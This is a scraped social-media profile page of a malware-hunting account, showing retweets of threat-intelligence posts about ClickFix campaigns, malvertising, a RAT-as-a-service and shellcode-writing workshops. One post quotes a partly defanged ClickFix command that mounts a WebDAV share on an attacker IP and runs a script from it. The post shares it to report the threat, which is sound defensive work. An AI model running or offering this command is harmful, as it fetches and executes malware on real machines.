ExecuteMalware

17.3K posts

ExecuteMalware

ExecuteMalware

@executemalware

#malware hunter & analyst. Opinions are my own.

Cold country Tham gia Haziran 2016
187 Đang theo dõi26.9K Người theo dõi
ExecuteMalware đã retweet
ANY.RUN
ANY.RUN@anyrun_app·
❗ macOS VM is now live ❗ 25K+ U.S. businesses already run on macOS. Yet #macOS threats remain a blind spot for many SOC teams. 👇 Close this gap now with a broader cross-platform threat visibility for faster and confident response! any.run/cybersecurity-…
English
1
9
33
2.8K
ExecuteMalware đã retweet
The DFIR Report
The DFIR Report@TheDFIRReport·
Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:
The DFIR Report tweet media
English
4
67
336
25.4K
ExecuteMalware đã retweet
RussianPanda 🐼 🇺🇦
RussianPanda 🐼 🇺🇦@RussianPanda9xx·
Tax season is open 🎯 New blog just dropped on a malvertising campaign targeting W-2/W-9 searches since January 2026 Google Ad -> dual-layer cloaking -> rogue ScreenConnect -> FatMalloc crypter (2GB alloc to choke AV emulators) -> previously undocumented Huawei audio driver killing EDR 60+ rogue SC instances across our customer base 💀 huntress.com/blog/w2-malver…
English
3
13
72
6.4K
ExecuteMalware đã retweet
RussianPanda 🐼 🇺🇦
RussianPanda 🐼 🇺🇦@RussianPanda9xx·
🚨 NEW VIDEO DROP FROM PANDA 🐼 I got a full walkthrough of @ThruntingLabs from @Kostastsale and this platform is different - no simulations. You are investigating REAL intrusions with REAL telemetry - query actual EDR logs in Elastic, Splunk, or Azure Log Analytics. If you're in blue team / SOC / IR or aspiring to be - I highly recommend checking it out 🔗 youtube.com/watch?v=YC-E5D…
YouTube video
YouTube
English
4
25
140
18.5K
ExecuteMalware đã retweet
Josh Stroschein | The Cyber Yeti
🏗️ You can’t create reliable Windows shellcode without a precise understanding of the Windows API. It's more than knowing the function—you must understand call order, handle preservation, and manual structure parsing. Watch Part 2 of the workshop here: 📺 youtu.be/xdCfeC7o2Ss Once we move to assembly, the "safety net" is gone. No compiler to catch type mismatches or manage your stack: 🔹 You are the memory manager for your structures. 🔹 You must manually ensure calling conventions are followed. 🔹 You are responsible for calculating every member offset by hand.
YouTube video
YouTube
English
0
5
33
2K
ExecuteMalware đã retweet
Josh Stroschein | The Cyber Yeti
🐚 Custom Windows shellcode is the ultimate way to learn OS internals and sharpen your assembly skills. 🗺️ Video 1: The Game Plan. We start in C to map out the APIs and logic before hitting the ASM. Watch Part 1: 📺 youtu.be/6oeMEzCKXyo ✅ Dev/Debug workflows ✅ Position-Independence (PIC) ✅ Module & API hashing ✅ Stack strings & Endianness ✅ XOR obfuscation & Decryption stubs
YouTube video
YouTube
English
0
11
37
3K
ExecuteMalware đã retweet
Jesko Hüttenhain
Jesko Hüttenhain@huettenhain·
A lot of convenience added to #BinaryRefinery in 0.10.2 overall, so this might be a good time to update. Hey @greglesnewich, remember when you wanted DMG archive support? Guess what ...
Jesko Hüttenhain tweet media
English
2
11
28
2.5K
ExecuteMalware đã retweet
Squiblydoo
Squiblydoo@SquiblydooBlog·
Nice update to @anyrun_app that seems easy to miss: HTTPS decryption. If you look at the network traffic, click Network Threats, you can click into the analysis to see the decrypted traffic You can also just download the entire decrypted PCAP. 1/3
Squiblydoo tweet mediaSquiblydoo tweet media
English
1
18
80
7K
ExecuteMalware đã retweet
JAMESWT
JAMESWT@JAMESWT_WT·
👇 http://rbcoeconsulting.]com/wp-content/plugins/pretty-manager/captcha.html 👇 cmd /c net use Z: http://94.156.170.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete 👇 app.any.run/tasks/80717be8…
JAMESWT tweet mediaJAMESWT tweet media
JAMESWT@JAMESWT_WT

New #Click-Fix Variant / webdav / workflow Some Related Samples +extra 👇 bazaar.abuse.ch/browse/tag/185… AnyRun Zip app.any.run/tasks/9af568c0… Triage Zip tria.ge/260221-2ety2ae… Msi tria.ge/260201-sfg67ae… cc @1ZRR4H @ShadowOpCode @k3dg3

0
3
8
847
ExecuteMalware đã retweet
ANY.RUN
ANY.RUN@anyrun_app·
👿 TrustConnect is a $300/month #RAT-as-a-Service hiding inside fake Zoom, Teams & Adobe installers. Signed with a fraudulent EV cert, streaming your screen via WebSocket, rebuilding under a new brand hours after takedown. 👉 Tech details & business impact: any.run/malware-trends…
ANY.RUN tweet media
English
1
7
12
2K
ExecuteMalware đã retweet
txc
txc@0x747863·
IcedID Config extraction: Writeup for a challenge part of Zero2Auto malware analysis course. txc.gitbook.io/documentation/… Also tried out the @REMnux MCP server to check out, how AI can support my analysis approaches and learning overall
English
1
5
22
1.7K